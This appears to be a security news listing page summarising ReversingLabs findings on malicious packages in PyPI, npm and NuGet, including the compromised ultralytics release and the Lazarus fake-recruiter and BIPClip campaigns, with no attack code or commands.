Reversing Labs

Compromised ultralytics PyPI package delivers crypto coinminer

On December 4, a malicious version 8.3.41 of the popular AI library ultralytics — which has almost 60 million downloads — was published to the Python Package Index (PyPI) package repository.

Fake Recruiter Coding Tests Target Developers With Malicious Python Packages

The Lazarus Group has been targeting developers in a new VMConnect campaign, using fake job interviews to trick them into downloading malicious software packages from open-source repositories.

Report: 95% of Organizations Face Severe Software Supply Chain Risk

OSC&R report reveals that 95% organizations face high software supply chain risks. Despite advancements in application security programs, more work is needed to manage risks effectively.

Malicious NuGet Campaign Uses Homoglyphs and IL Weaving to Fool Devs

This new set of packages, consisting of approximately 60 packages and 290 versions, showcases a more sophisticated approach compared to earlier attacks revealed in October 2023, according to ReversingLabs.

Malicious NPM Package Targets AWS Users to Deploy Backdoor

ReversingLabs researchers discovered a suspicious package on npm called legacyreact-aws-s3-typescript. They found that the package contained a post-install script that downloaded and executed a simple backdoor.

Python Downloader Highlights Noise Problem in Open Source Threat Detection

This incident sheds light on the challenge of tracking and mitigating open-source threats, specifically the issue of "noise" in the form of low-quality test packages and low-distribution malicious packages.

Why Shareable SBOMs are Essential for Software Security

Development teams need to plan ahead and create shareable SBOMs that are standardized in a format that's readily consumable while also establishing scalable systems for attestation, access management, and data verification, among other factors.

Malicious PyPI Packages Target Crypto Wallet Recovery Passwords in BIPClip Campaign

The malicious packages used name squatting, disguised dependencies, and legitimate-looking code to steal mnemonic phrases, evading detection and targeting crypto assets without broader system compromise.

GitGot: GitHub Leveraged by Cybercriminals to Store Stolen Data

It appears that the package author was in the process of building out the malware and adding layers of deception. Fortunately, the package was detected and removed from npm before that could happen.

Malware Leveraging Public Infrastructure Like GitGub on the Rise

Public services like GitHub provide a convenient and less suspicious platform for malware authors to operate their C2 infrastructure, eliminating the need for maintaining their own servers.

Defend Against Threats with Cyber Fusion

Cyware is the leading provider of cyber fusion solutions that power threat intelligence sharing , end-to-end automation and 360-degree threat response.

Trending Tags